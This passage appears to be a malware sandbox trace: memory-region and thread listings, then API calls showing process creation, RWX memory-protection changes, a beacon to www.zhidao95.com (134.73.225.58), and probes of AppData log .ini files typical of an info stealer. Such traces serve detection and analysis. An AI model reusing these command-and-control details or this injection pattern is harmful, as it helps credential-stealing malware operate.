region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3284 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3299 start_va = 0xb580000 end_va = 0xbafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b580000" filename = "" Region: id = 3302 start_va = 0x410000 end_va = 0x412fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 3303 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3304 start_va = 0x13530000 end_va = 0x13a21fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013530000" filename = "" Region: id = 3311 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3318 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3334 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3349 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3364 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3381 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3386 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3402 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3424 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3435 start_va = 0xb580000 end_va = 0xbafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b580000" filename = "" Region: id = 3442 start_va = 0x410000 end_va = 0x413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 3443 start_va = 0x13a30000 end_va = 0x13f21fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013a30000" filename = "" Region: id = 3470 start_va = 0x410000 end_va = 0x413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 3529 start_va = 0xb580000 end_va = 0xbafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b580000" filename = "" Region: id = 3566 start_va = 0x13f30000 end_va = 0x14421fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013f30000" filename = "" Region: id = 3586 start_va = 0x7ffd9d880000 end_va = 0x7ffd9da1dfff monitored = 0 entry_point = 0x7ffd9d885480 region_type = mapped_file name = "comsvcs.dll" filename = "\\Windows\\System32\\comsvcs.dll" (normalized: "c:\\windows\\system32\\comsvcs.dll") Region: id = 3589 start_va = 0x410000 end_va = 0x413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 3590 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3599 start_va = 0x14430000 end_va = 0x144affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014430000" filename = "" Region: id = 3600 start_va = 0x144b0000 end_va = 0x1452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000144b0000" filename = "" Region: id = 3605 start_va = 0x410000 end_va = 0x413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 3606 start_va = 0x430000 end_va = 0x451fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 3607 start_va = 0x14530000 end_va = 0x145affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014530000" filename = "" Region: id = 3608 start_va = 0x14630000 end_va = 0x146affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014630000" filename = "" Region: id = 3609 start_va = 0x146b0000 end_va = 0x1472ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000146b0000" filename = "" Region: id = 3610 start_va = 0x14730000 end_va = 0x147affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014730000" filename = "" Region: id = 3613 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3615 start_va = 0xb580000 end_va = 0xba71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b580000" filename = "" Region: id = 3616 start_va = 0x147b0000 end_va = 0x1482ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000147b0000" filename = "" Region: id = 3617 start_va = 0x7ffd9f680000 end_va = 0x7ffd9f6b0fff monitored = 0 entry_point = 0x7ffd9f697820 region_type = mapped_file name = "shutdownux.dll" filename = "\\Windows\\System32\\shutdownux.dll" (normalized: "c:\\windows\\system32\\shutdownux.dll") Region: id = 3618 start_va = 0xa640000 end_va = 0xa735fff monitored = 0 entry_point = 0xa641840 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 3619 start_va = 0xa640000 end_va = 0xa735fff monitored = 0 entry_point = 0xa641840 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 3620 start_va = 0x430000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "basebrd.dll.mui" filename = "\\Windows\\Branding\\Basebrd\\en-US\\basebrd.dll.mui" (normalized: "c:\\windows\\branding\\basebrd\\en-us\\basebrd.dll.mui") Region: id = 3621 start_va = 0x440000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3622 start_va = 0x430000 end_va = 0x432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shutdownux.dll.mui" filename = "\\Windows\\System32\\en-US\\ShutdownUX.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shutdownux.dll.mui") Region: id = 3623 start_va = 0xa640000 end_va = 0xa6d9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a640000" filename = "" Region: id = 3624 start_va = 0x410000 end_va = 0x413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 3625 start_va = 0x22b0000 end_va = 0x22d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 3626 start_va = 0x4200000 end_va = 0x4221fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 3627 start_va = 0x14830000 end_va = 0x148affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014830000" filename = "" Region: id = 3629 start_va = 0x410000 end_va = 0x414fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 3630 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Thread: id = 10 os_tid = 0x1310 Thread: id = 11 os_tid = 0x1298 Thread: id = 12 os_tid = 0x1244 Thread: id = 13 os_tid = 0x118c Thread: id = 14 os_tid = 0x115c Thread: id = 15 os_tid = 0xdfc Thread: id = 16 os_tid = 0x8ec Thread: id = 17 os_tid = 0xcc8 Thread: id = 18 os_tid = 0xe78 Thread: id = 19 os_tid = 0xb24 Thread: id = 20 os_tid = 0xda0 Thread: id = 21 os_tid = 0xa8c Thread: id = 22 os_tid = 0xd64 Thread: id = 23 os_tid = 0xd34 Thread: id = 24 os_tid = 0xcec Thread: id = 25 os_tid = 0xe58 Thread: id = 26 os_tid = 0xe54 Thread: id = 27 os_tid = 0xe4c Thread: id = 28 os_tid = 0xe40 Thread: id = 29 os_tid = 0xe14 Thread: id = 30 os_tid = 0xb7c Thread: id = 31 os_tid = 0xb4c Thread: id = 32 os_tid = 0xb34 Thread: id = 33 os_tid = 0xb30 Thread: id = 34 os_tid = 0xb2c Thread: id = 35 os_tid = 0xb28 Thread: id = 36 os_tid = 0xb0c Thread: id = 37 os_tid = 0xb08 Thread: id = 38 os_tid = 0xad0 Thread: id = 39 os_tid = 0x9b4 Thread: id = 40 os_tid = 0x960 Thread: id = 41 os_tid = 0x950 Thread: id = 42 os_tid = 0x940 Thread: id = 43 os_tid = 0x93c Thread: id = 44 os_tid = 0x914 Thread: id = 45 os_tid = 0x90c Thread: id = 46 os_tid = 0x8fc Thread: id = 47 os_tid = 0x8cc Thread: id = 48 os_tid = 0x8b0 Thread: id = 49 os_tid = 0x85c Thread: id = 50 os_tid = 0x848 Thread: id = 51 os_tid = 0x844 Thread: id = 52 os_tid = 0x83c Thread: id = 53 os_tid = 0x168 Thread: id = 54 os_tid = 0x7d0 Thread: id = 55 os_tid = 0x7cc Thread: id = 56 os_tid = 0x7c8 Thread: id = 57 os_tid = 0x7c4 Thread: id = 58 os_tid = 0x7c0 Thread: id = 59 os_tid = 0x7a4 Thread: id = 60 os_tid = 0x798 Thread: id = 61 os_tid = 0x790 [0124.710] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\SysWOW64\\systray.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x800000c, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xcf928*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xcf900, hNewToken=0x0 | out: lpProcessInformation=0xcf900*(hProcess=0x1d58, hThread=0x1944, dwProcessId=0x374, dwThreadId=0x38c), hNewToken=0x0) returned 1 [0149.843] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0xcf590 | out: HeapArray=0xcf590*=0x5c0000) returned 0x6 [0149.850] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x3da0) returned 0x9e74ad0 [0149.864] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xcf370 | out: Value="RDhJ0CNFevzX") returned 0x0 [0149.903] RtlIntegerToChar (in: Value=0x78c, Base=0x0, Length=0x20, String=0xcf950 | out: String="1932") returned 0x0 [0149.903] RtlIntegerToChar (in: Value=0x3cd2f0f, Base=0x0, Length=0x20, String=0xcf950 | out: String="63778575") returned 0x0 [0149.903] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="S-1-5-21-1560258-193263778575") returned 0x1d9c [0149.904] GetLastError () returned 0x0 [0150.199] LdrGetProcedureAddress (in: BaseAddress=0x7ffda96b0000, Name="CoUninitialize", Ordinal=0x0, ProcedureAddress=0xcf810 | out: ProcedureAddress=0xcf810*=0x7ffda9061540) returned 0x0 [0150.202] LdrGetProcedureAddress (in: BaseAddress=0x7ffda96b0000, Name="CoInitializeEx", Ordinal=0x0, ProcedureAddress=0xcf810 | out: ProcedureAddress=0xcf810*=0x7ffda9062c50) returned 0x0 [0150.208] LdrGetProcedureAddress (in: BaseAddress=0x7ffda96b0000, Name="CoCreateInstance", Ordinal=0x0, ProcedureAddress=0xcf810 | out: ProcedureAddress=0xcf810*=0x7ffda909fb70) returned 0x0 [0150.285] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xcf100 | out: Value="RDhJ0CNFevzX") returned 0x0 [0150.301] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xcf400 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0150.324] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xcf5b8*=0x7ffda8ebcad0, NumberOfBytesToProtect=0xcf5b0, NewAccessProtection=0x40, OldAccessProtection=0xcf700 | out: BaseAddress=0xcf5b8*=0x7ffda8ebc000, NumberOfBytesToProtect=0xcf5b0, OldAccessProtection=0xcf700*=0x20) returned 0x0 [0150.352] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xcf5b8*=0x7ffda8ebcad0, NumberOfBytesToProtect=0xcf5b0, NewAccessProtection=0x20, OldAccessProtection=0xcf700 | out: BaseAddress=0xcf5b8*=0x7ffda8ebc000, NumberOfBytesToProtect=0xcf5b0, OldAccessProtection=0xcf700*=0x40) returned 0x0 [0150.693] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xcf5b8*=0x7ffda8ec2df0, NumberOfBytesToProtect=0xcf5b0, NewAccessProtection=0x40, OldAccessProtection=0xcf700 | out: BaseAddress=0xcf5b8*=0x7ffda8ec2000, NumberOfBytesToProtect=0xcf5b0, OldAccessProtection=0xcf700*=0x20) returned 0x0 [0150.733] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xcf5b8*=0x7ffda8ec2df0, NumberOfBytesToProtect=0xcf5b0, NewAccessProtection=0x20, OldAccessProtection=0xcf700 | out: BaseAddress=0xcf5b8*=0x7ffda8ec2000, NumberOfBytesToProtect=0xcf5b0, OldAccessProtection=0xcf700*=0x40) returned 0x0 [0150.825] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xcf5b8*=0x7ffda8ebc540, NumberOfBytesToProtect=0xcf5b0, NewAccessProtection=0x40, OldAccessProtection=0xcf700 | out: BaseAddress=0xcf5b8*=0x7ffda8ebc000, NumberOfBytesToProtect=0xcf5b0, OldAccessProtection=0xcf700*=0x20) returned 0x0 [0150.842] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xcf5b8*=0x7ffda8ebc540, NumberOfBytesToProtect=0xcf5b0, NewAccessProtection=0x20, OldAccessProtection=0xcf700 | out: BaseAddress=0xcf5b8*=0x7ffda8ebc000, NumberOfBytesToProtect=0xcf5b0, OldAccessProtection=0xcf700*=0x40) returned 0x0 [0150.979] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xcf5b8*=0x7ffda8ebc670, NumberOfBytesToProtect=0xcf5b0, NewAccessProtection=0x40, OldAccessProtection=0xcf700 | out: BaseAddress=0xcf5b8*=0x7ffda8ebc000, NumberOfBytesToProtect=0xcf5b0, OldAccessProtection=0xcf700*=0x20) returned 0x0 [0150.996] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xcf5b8*=0x7ffda8ebc670, NumberOfBytesToProtect=0xcf5b0, NewAccessProtection=0x20, OldAccessProtection=0xcf700 | out: BaseAddress=0xcf5b8*=0x7ffda8ebc000, NumberOfBytesToProtect=0xcf5b0, OldAccessProtection=0xcf700*=0x40) returned 0x0 [0151.130] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xcf39e, cbSize=0xcf370 | out: pszUAOut="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", cbSize=0xcf370) returned 0x0 [0151.434] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xcf770 | out: lpWSAData=0xcf770) returned 0 [0151.444] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x82b6ca5, lpParameter=0x82bbfc6, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2010 Thread: id = 84 os_tid = 0x7a8 [0151.529] Sleep (dwMilliseconds=0x7d0) [0153.603] Sleep (dwMilliseconds=0x7d0) [0155.677] Sleep (dwMilliseconds=0x7d0) [0157.712] Sleep (dwMilliseconds=0x7d0) [0159.714] Sleep (dwMilliseconds=0x7d0) [0161.768] Sleep (dwMilliseconds=0x7d0) [0163.857] Sleep (dwMilliseconds=0x7d0) [0165.939] Sleep (dwMilliseconds=0x7d0) [0168.033] Sleep (dwMilliseconds=0x7d0) [0170.046] Sleep (dwMilliseconds=0x7d0) [0172.060] Sleep (dwMilliseconds=0x7d0) [0172.107] Sleep (dwMilliseconds=0x7d0) [0172.180] Sleep (dwMilliseconds=0x7d0) [0172.223] Sleep (dwMilliseconds=0x7d0) [0172.269] Sleep (dwMilliseconds=0x7d0) [0172.313] Sleep (dwMilliseconds=0x7d0) [0172.428] Sleep (dwMilliseconds=0x7d0) [0172.473] Sleep (dwMilliseconds=0x7d0) [0172.569] Sleep (dwMilliseconds=0x7d0) [0172.755] Sleep (dwMilliseconds=0x7d0) [0172.820] Sleep (dwMilliseconds=0x7d0) [0172.826] Sleep (dwMilliseconds=0x7d0) [0172.864] Sleep (dwMilliseconds=0x7d0) [0172.867] Sleep (dwMilliseconds=0x7d0) [0173.686] Sleep (dwMilliseconds=0x7d0) [0173.740] Sleep (dwMilliseconds=0x7d0) [0173.992] Sleep (dwMilliseconds=0x7d0) [0174.330] Sleep (dwMilliseconds=0x7d0) [0174.458] Sleep (dwMilliseconds=0x7d0) [0174.567] Sleep (dwMilliseconds=0x7d0) [0174.673] Sleep (dwMilliseconds=0x7d0) [0174.745] Sleep (dwMilliseconds=0x7d0) [0174.853] Sleep (dwMilliseconds=0x7d0) [0174.967] Sleep (dwMilliseconds=0x7d0) [0175.160] Sleep (dwMilliseconds=0x7d0) [0175.240] Sleep (dwMilliseconds=0x7d0) [0175.292] Sleep (dwMilliseconds=0x7d0) [0175.349] Sleep (dwMilliseconds=0x7d0) [0175.428] Sleep (dwMilliseconds=0x7d0) [0175.522] Sleep (dwMilliseconds=0x7d0) [0175.614] Sleep (dwMilliseconds=0x7d0) [0175.665] Sleep (dwMilliseconds=0x7d0) [0175.876] socket (af=2, type=1, protocol=6) returned 0x1cc4 [0175.887] getaddrinfo (in: pNodeName="www.zhidao95.com", pServiceName="80", pHints=0x9e74b18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e74b48 | out: ppResult=0x9e74b48*=0xa05fb50*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f8db50*(sa_family=2, sin_port=0x50, sin_addr="134.73.225.58"), ai_next=0x0)) returned 0 [0176.215] htons (hostshort=0x50) returned 0x5000 [0176.215] connect (s=0x1cc4, name=0x9f8db50*(sa_family=2, sin_port=0x50, sin_addr="134.73.225.58"), namelen=16) returned 0 [0176.403] send (s=0x1cc4, buf=0x82e10fa*, len=166, flags=0) returned 166 [0176.404] setsockopt (s=0x1cc4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0176.404] recv (in: s=0x1cc4, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 2039 [0176.602] closesocket (s=0x1cc4) returned 0 [0176.603] Sleep (dwMilliseconds=0x7d0) [0176.641] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.647] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.671] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0176.671] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f93f0) returned 1 [0176.671] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.672] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.672] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0176.672] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f93f0) returned 1 [0176.672] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.672] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.672] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0176.672] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f93f0) returned 1 [0176.672] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.673] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.673] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0176.673] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7500) returned 1 [0176.673] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.673] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.673] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0176.673] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f93f0) returned 1 [0176.673] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.673] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0176.674] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0176.674] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f93f0) returned 1 [0176.674] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.674] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: 